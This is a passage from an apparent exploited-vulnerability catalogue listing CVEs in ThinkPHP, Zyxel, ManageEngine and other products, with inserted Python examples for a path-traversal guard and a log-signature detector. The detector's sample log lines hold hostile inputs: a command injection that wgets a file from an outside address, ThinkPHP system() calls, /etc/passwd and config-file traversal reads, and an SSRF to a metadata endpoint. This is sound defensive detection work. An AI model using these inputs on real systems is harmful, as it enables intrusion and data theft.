Exploitation References: https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2018-0296; https://dashboard.shadowserver.org/statistics/honeypot/vulnerabil
VulnCheck
ThinkPHP "noneCms" Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-20062 [CRITICAL] CWE-20 ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" contains an unspecified vulnerability that allows for remote code execution through crafted use of the filter parameter.
Affected: ThinkPHP noneCms
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/; https://securityintelligence.com/posts/top-10-cybersecurity-vulnerabilities-2020/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/defaul
VulnCheck
Elastic Kibana External Control of File Name or Path
vulncheck·2018·CVSS 9.8
CVE-2018-17246 [CRITICAL] Elastic Kibana External Control of File Name or Path
Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
Affected: Elastic Kibana
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-17246; https://dashboard.shadowserver.org/statistics/honeypot/
VulnCheck
Jenkins github Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2018·CVSS 8.8
CVE-2018-1000600 [HIGH] Jenkins github Exposure of Sensitive Information to an Unauthorized Actor
An exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Affected: Jenkins github
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/t
VulnCheck
fullworksplugins stop_user_enumeration Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2017·CVSS 5.3
CVE-2017-1000226 [MEDIUM] fullworksplugins stop_user_enumeration Exposure of Sensitive Information to an Unauthorized Actor
Stop User Enumeration 1.3.8 allows user enumeration via the REST API.
Affected: fullworksplugins stop_user_enumeration
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Zyxel P660HN-T1A Routers Command Injection Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-18368 [CRITICAL] CWE-78 Zyxel P660HN-T1A Routers Command Injection Vulnerability
Zyxel P660HN-T1A routers contain a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user and exploited via the remote_host parameter of the ViewLog.asp page.
Affected: Zyxel P660HN-T1A Routers
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cujo.com/blog/iot-botnet-report-2021-malware-and-vulnerabilities-targeted/; https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-
VulnCheck
Atlassian oauth Server-Side Request Forgery (SSRF)
vulncheck·2017·CVSS 6.1
CVE-2017-9506 [MEDIUM] Atlassian oauth Server-Side Request Forgery (SSRF)
The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
Affected: Atlassian oauth
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-20
VulnCheck
manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2017·CVSS 7.5
CVE-2017-11512 [HIGH] manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
Affected: manageengine servicedesk
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.checkpoint.com/security/december-2021s-most-wanted-malware-trickbot-emotet-and-the-log4j-plague/; https://blog.checkpoint.com/security/april-2022s-most-wanted-malware-a-shake-up-in-the-inde
VulnCheck
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
vulncheck·2017·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/; https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/; https://isc.sans.edu/diary/Criminals+Dont+Read+Instructions+or+Use+Strong+Passwords/23850; https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html; https://www.lacework.com/blog/elf-of-the-month-new-lucky-ransomware-sample
VulnCheck
Red Hat JBoss Application Server Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-12149 [CRITICAL] CWE-502 Red Hat JBoss Application Server Remote Code Execution Vulnerability
The JBoss Application Server, shipped with Red Hat Enterprise Application Platform 5.2, allows an attacker to execute arbitrary code via crafted serialized data.
Affected: Red Hat JBoss Application Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2017-12149; https://www.lacework.com/blog/elf-of-the-month-new-lucky-ransomware-sample/; https://cyware.com/news/satan-ransomware-an-overview-of-the-ransomwares-variants-and-exploits-35acecd3; https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055; https://web.archive.org/web/20220227045141/https://risksen
VulnCheck
dedecms dedecms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2017·CVSS 9.8
CVE-2017-17731 [CRITICAL] dedecms dedecms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
Affected: dedecms dedecms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://app.crowdsec.net/cti/cve-explorer/CVE-2017-17731
VulnCheck
PHPUnit Command Injection Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-9841 [CRITICAL] CWE-94 PHPUnit Command Injection Vulnerability
PHPUnit allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
Affected: PHPUnit PHPUnit
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malw
VulnCheck
dnnsoftware DotNetNuke (DNN) Server-Side Request Forgery (SSRF)
vulncheck·2017·CVSS 7.5
CVE-2017-0929 [HIGH] dnnsoftware DotNetNuke (DNN) Server-Side Request Forgery (SSRF)
DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
Affected: dnnsoftware DotNetNuke (DNN)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://www.greynoise.io/blog/new-ssrf
VulnCheck
manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2017·CVSS 7.5
CVE-2017-11511 [HIGH] manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the filepath parameter for the download-file URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
Affected: manageengine servicedesk
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/a
VulnCheck
NETGEAR readynas_surveillance Improper Input Validation
vulncheck·2016·CVSS 9.8
CVE-2016-5674 [CRITICAL] NETGEAR readynas_surveillance Improper Input Validation
__debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
Affected: NETGEAR readynas_surveillance
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-23&host_type=src&vulnerability=cve-2016-5674; https://dashboard.shadowserver.org/statistics/honeypot
VulnCheck
bonitasoft bonita_bpm_portal Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 5.0
CVE-2015-3897 [MEDIUM] bonitasoft bonita_bpm_portal Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
Affected: bonitasoft bonita_bpm_portal
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/contin
VulnCheck
helpdesk_pro_project helpdesk_pro Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 7.5
CVE-2015-4074 [HIGH] helpdesk_pro_project helpdesk_pro Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
Affected: helpdesk_pro_project helpdesk_pro
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-s
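The path traversal entries in this list (ManageEngine download-file/filepath and download-snapshot/name, Bonita themeResource/theme, Helpdesk Pro ticket.download_attachment/filename, and the jsmol2wp php://filter read) all come down to one missing control: the server joined a request parameter onto a base directory without checking that the result stayed inside it. The following is an added example, not code from any of those products, showing the vulnerable join next to a hardened resolver and exercising both on constructed inputs (the directory tree and file names built by run_demo() are invented for the demo):

```python
"""Containment check for user-supplied file paths, the control whose absence
the traversal entries above describe (download-file/filepath,
download-snapshot/name, themeResource/theme, ticket.download_attachment/
filename).  Added example in generic Python, not any of those products' code;
the directory tree built by run_demo() is constructed."""
import os
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would leave the download directory."""


def naive_download(base_dir, user_path):
    """The vulnerable pattern: join the parameter onto the base and open it.
    '../../etc/passwd' normalises straight out of base_dir."""
    return os.path.normpath(os.path.join(base_dir, user_path))


def resolve_download(base_dir, user_path):
    """Return the real path of user_path under base_dir, or raise TraversalError.

    Decode twice (so %252e%252e%252f is seen as ../), reject empty, absolute
    and NUL-containing input, fold backslashes, resolve symlinks with realpath,
    then require the result to sit under the realpath'd base.  commonpath is
    used instead of startswith because '/srv/files2' starts with '/srv/files'."""
    decoded = unquote(unquote(user_path))
    if not decoded or "\x00" in decoded:
        raise TraversalError("empty path or NUL byte")
    if decoded.startswith(("/", "\\")) or os.path.isabs(decoded):
        raise TraversalError("absolute path rejected")
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, decoded.replace("\\", "/")))
    if os.path.commonpath([root, target]) != root:
        raise TraversalError(f"{user_path!r} resolves outside {base_dir}")
    return target


def serve_path(base_dir, user_path):
    """Resolved path, or None when the request is rejected."""
    try:
        return resolve_download(base_dir, user_path)
    except TraversalError:
        return None


CASES = [  # constructed inputs
    "reports/q1.pdf",                  # legitimate request
    "reports/../reports/q1.pdf",       # dot-dot that stays inside: allowed
    "../../etc/passwd",                # plain traversal, as in the filepath/name/theme params
    "..%2f..%2fetc%2fpasswd",          # single percent-encoding
    "%252e%252e%252fetc%252fpasswd",   # double percent-encoding
    "..\\..\\windows\\win.ini",        # backslash separators
    "/etc/passwd",                     # absolute path
    "link_out/passwd",                 # symlink inside base_dir that points outside
]


def run_demo():
    """Build a throwaway tree and map each case to the path, relative to the
    base, that the hardened resolver would serve, or None if it refuses."""
    base = tempfile.mkdtemp(prefix="files_")
    outside = tempfile.mkdtemp(prefix="outside_")
    os.makedirs(os.path.join(base, "reports"))
    open(os.path.join(base, "reports", "q1.pdf"), "w").close()
    open(os.path.join(outside, "passwd"), "w").close()
    try:
        os.symlink(outside, os.path.join(base, "link_out"))
    except (OSError, NotImplementedError):
        pass  # no symlink support: that case is skipped below
    root = os.path.realpath(base)
    results = {}
    for case in CASES:
        if case.startswith("link_out") and not os.path.islink(os.path.join(base, "link_out")):
            continue
        target = serve_path(base, case)
        results[case] = None if target is None else os.path.relpath(target, root)
    return results


if __name__ == "__main__":
    print("naive:", naive_download("/srv/files", "../../etc/passwd"))
    for case, served in run_demo().items():
        print(f"{case!r:38} -> {served}")
```

The symlink case is the one a pure string check misses: `link_out/passwd` contains no `..` at all, yet `realpath` follows the link outside the base and the `commonpath` comparison rejects it.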
VulnCheck
umbraco umbraco Server-Side Request Forgery (SSRF)
vulncheck·2015·CVSS 8.2
CVE-2015-8813 [HIGH] umbraco umbraco Server-Side Request Forgery (SSRF)
The Page_Load function in Umbraco.Web/umbraco.presentation/umbraco/dashboard/FeedProxy.aspx.cs in Umbraco before 7.4.0 allows remote attackers to conduct server-side request forgery (SSRF) attacks via the url parameter.
Affected: umbraco umbraco
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
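Most of the entries above quote the exact request shape that is sprayed at the Internet: the ThinkPHP invokefunction query, the PHPUnit eval-stdin.php path, the TBK DVR uid=admin cookie on device.rsp, shell metacharacters in Zyxel's ViewLog.asp remote_host, php://filter in jsmol.php's query, the Fuel CMS pages/select filter, DedeCMS tag_test_action.php partcode with runphp, traversal in ManageEngine's download-file/filepath and download-snapshot/name, any request to NUUO/ReadyNAS __debugging_center_utils___.php, Bonita themeResource/theme, Helpdesk Pro ticket.download_attachment/filename, a URL in Umbraco FeedProxy.aspx, and markup in MicroStrategy Login.asp Msg. The following is an added example, not code from the page's sources, that turns those descriptions into parameter-level signatures and runs them over constructed access-log lines. The log format, the sample lines, and the directory prefixes in them (/cgi-bin/, /wp-content/plugins/jsmol2wp/php/, /umbraco/dashboard/, option=com_helpdeskpro) are assumptions; only the file and parameter names come from the entries themselves.

```python
"""Signature checks for the request shapes quoted in the catalogue entries
above, run over constructed access-log lines.  Added example, not code from
the page's sources; the log format and the sample lines are constructed."""
import re
from typing import NamedTuple, Optional
from urllib.parse import parse_qs, unquote, urlsplit

TRAVERSAL = r"\.\.[/\\]"          # ../ or ..\ once percent-decoding is undone
SHELL_META = r"[;|`]|\$\("        # command separators / substitution in a host field


class Rule(NamedTuple):
    name: str
    path: Optional[str]      # regex the decoded path must match; None = any path
    params: dict             # query parameter -> regex on its value; None = just present
    cookie: Optional[tuple]  # (name, value) the Cookie header must carry


RULES = [
    Rule("ThinkPHP invokefunction RCE", None,
         {"s": r"\\think\\app/invokefunction"}, None),
    Rule("CVE-2017-9841 PHPUnit eval-stdin.php",
         r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php$", {}, None),
    Rule("CVE-2018-9995 TBK DVR auth bypass", r"device\.rsp$", {}, ("uid", "admin")),
    Rule("CVE-2017-18368 Zyxel ViewLog.asp injection", r"ViewLog\.asp$",
         {"remote_host": SHELL_META}, None),
    Rule("CVE-2018-20463 jsmol2wp file read/SSRF", r"jsmol\.php$",
         {"query": r"^php://filter|" + TRAVERSAL}, None),
    Rule("CVE-2018-16763 Fuel CMS code eval", r"/pages/select/", {"filter": None}, None),
    Rule("CVE-2018-7700 DedeCMS runphp", r"tag_test_action\.php$",
         {"partcode": r"runphp"}, None),
    Rule("CVE-2017-11511 ManageEngine download-file", r"download-file",
         {"filepath": TRAVERSAL}, None),
    Rule("CVE-2017-11512 ManageEngine download-snapshot", r"download-snapshot",
         {"name": TRAVERSAL}, None),
    Rule("CVE-2016-5674 NUUO/ReadyNAS debugging_center",
         r"__debugging_center_utils___\.php$", {"log": None}, None),
    Rule("CVE-2015-3897 Bonita themeResource traversal", r"bonita/portal/themeResource",
         {"theme": TRAVERSAL}, None),
    Rule("CVE-2015-4074 Helpdesk Pro attachment traversal", None,
         {"task": r"^ticket\.download_attachment$", "filename": TRAVERSAL}, None),
    Rule("CVE-2015-8813 Umbraco FeedProxy SSRF", r"FeedProxy\.aspx$",
         {"url": r"^[a-z][a-z0-9+.-]*://"}, None),
    Rule("CVE-2018-18775 MicroStrategy Login.asp XSS", r"Login\.asp$",
         {"Msg": r"[<>]|javascript:"}, None),
]

# Constructed log format: client method url status cookie="..."  ("-" = no cookie)
LOG_RE = re.compile(r'^(\S+) ([A-Z]+) (\S+) (\d{3}) cookie="([^"]*)"$')


def parse_line(line):
    """Split one log line into (method, decoded path, params, cookies) or None.
    Parameter values are decoded a second time so %252e%252e%252f is seen as ../."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    _, method, url, _, cookie_hdr = m.groups()
    parts = urlsplit(url)
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    cookies = dict(p.strip().split("=", 1) for p in cookie_hdr.split(";") if "=" in p)
    return method, unquote(parts.path), params, cookies


def detect(method, path, params, cookies):
    """Names of all rules whose path, parameter and cookie conditions hold."""
    hits = []
    for rule in RULES:
        if rule.path and not re.search(rule.path, path, re.I):
            continue
        if rule.cookie and cookies.get(rule.cookie[0]) != rule.cookie[1]:
            continue
        if all(name in params and (pattern is None or
                                   any(re.search(pattern, v, re.I) for v in params[name]))
               for name, pattern in rule.params.items()):
            hits.append(rule.name)
    return hits


def scan(lines):
    """One list of rule names per input line; an empty list means nothing fired."""
    results = []
    for line in lines:
        parsed = parse_line(line)
        results.append(detect(*parsed) if parsed else [])
    return results


SAMPLE_LOG = [  # constructed; addresses are from documentation ranges
    r'203.0.113.7 GET /public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 200 cookie="-"',
    '203.0.113.8 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 200 cookie="-"',
    '198.51.100.3 GET /device.rsp?opt=user&cmd=list 200 cookie="uid=admin"',
    '198.51.100.4 GET /cgi-bin/ViewLog.asp?remote_host=%3Bwget+http%3A%2F%2F198.51.100.9%2Fx+-O+%2Ftmp%2Fx 200 cookie="-"',
    '198.51.100.5 GET /download-file?filepath=..%252f..%252f..%252fetc%252fpasswd 200 cookie="-"',
    '198.51.100.6 GET /bonita/portal/themeResource?theme=../../../&location=../../../../etc/passwd 200 cookie="-"',
    '198.51.100.7 GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../wp-config.php 200 cookie="-"',
    '198.51.100.8 GET /umbraco/dashboard/FeedProxy.aspx?url=http://169.254.169.254/latest/meta-data/ 200 cookie="-"',
    '198.51.100.9 GET /index.php?option=com_helpdeskpro&task=ticket.download_attachment&filename=../../../configuration.php 200 cookie="-"',
    '192.0.2.10 GET /index.php?s=index/blog/view&id=7 200 cookie="session=abc123"',  # benign ThinkPHP route
    '192.0.2.11 GET /device.rsp?opt=user&cmd=list 401 cookie="uid=guest"',           # benign: no admin cookie
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(hits or ["-"], line.split(" ", 2)[2].split(" ")[0][:70])
```

Rules key on the parameter that carries the payload rather than on the path alone, so a normal ThinkPHP `s=` route or a device.rsp request without the uid=admin cookie does not alert; the double decode in parse_line is what catches the `%252e%252e%252f` form of the ManageEngine traversal in the sample.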
VulnCheck
Android Nexus 5 Qualcomm Components Elevation of Privilege Vulnerability
vulncheck·2014·CVSS 7.8
CVE-2014-9792 [HIGH] Android Nexus 5 Qualcomm Components Elevation of Privilege Vulnerability
arch/arm/mach-msm/ipc_router.c in the Qualcomm components in Android before 2016-07-05 on Nexus 5 devices uses an incorrect integer data type, which allows attackers to gain privileges via a crafted application, aka Android internal bug 28769399 and Qualcomm internal bug CR550606.
Affected: Google Android
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/conti
VulnCheck
seagate blackarmor_nas_220_firmware Improper Input Validation
vulncheck·2014·CVSS 9.8
CVE-2014-3206 [CRITICAL] seagate blackarmor_nas_220_firmware Improper Input Validation
Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
Affected: seagate blackarmor_nas_220_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://twitter.com/ESETresearch/status/1440052837820428298?s=20; https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx; https://cujo.com/blog/iot-botnet-report-2021-malware-and-vulnerabilities-targeted/; https://cujo.com/blog/the-2022-2023-iot-botnet-report-
VulnCheck
marketo_ma_project marketo_ma Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2014·CVSS 3.5
CVE-2014-8379 [LOW] marketo_ma_project marketo_ma Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
marketo_ma_project marketo_ma Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Multiple cross-site scripting (XSS) vulnerabilities in the Marketo MA module before 7.x-1.5 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to field titles to the (1) Webform or (2) User sub-modules.
Affected: marketo_ma_project marketo_ma
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; htt
VulnCheck
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
vulncheck·2014·CVSS 9.8
CVE-2014-6287 [CRITICAL] CWE-94 Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (HFS or HttpFileServer) allows remote attackers to execute arbitrary programs.
Affected: Rejetto HTTP File Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.trendmicro.com/en_us/research/19/f/blacksquid-slithers-into-servers-and-drives-with-8-notorious-exploits-to-drop-xmrig-miner.html; https://s.tencent.com/research/report/737.html; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities-exploits-and-malware-driving-attack-campaigns-in-november-2019; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-b
VulnCheck
ZTE F460 and F660 Cable Modems web_shell_cmd.gch Security Bypass
vulncheck·2014·CVSS 10.0
CVE-2014-2321 [CRITICAL] ZTE F460 and F660 Cable Modems web_shell_cmd.gch Security Bypass
ZTE F460 and F660 Cable Modems web_shell_cmd.gch Security Bypass
web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
Affected: ZTE f460
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/; https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cybersecurity
VulnCheck
Siemens simatic_s7_cpu_1200_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2014·CVSS 4.3
CVE-2014-2908 [MEDIUM] Siemens simatic_s7_cpu_1200_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Siemens simatic_s7_cpu_1200_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected: Siemens simatic_s7_cpu_1200_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intellige
VulnCheck
Apache Struts Improper Input Validation Vulnerability
vulncheck·2013·CVSS 9.8
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts Improper Input Validation Vulnerability
Apache Struts Improper Input Validation Vulnerability
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.
Affected: Apache Struts
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://www.labs.greynoise.io/grimoire/2025-12-26-coldfusion/
Remediation Due: 2022-04-15
VulnCheck
D-Link dcs-3411_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2013·CVSS 9.8
CVE-2013-1599 [CRITICAL] D-Link dcs-3411_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
D-Link dcs-3411_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
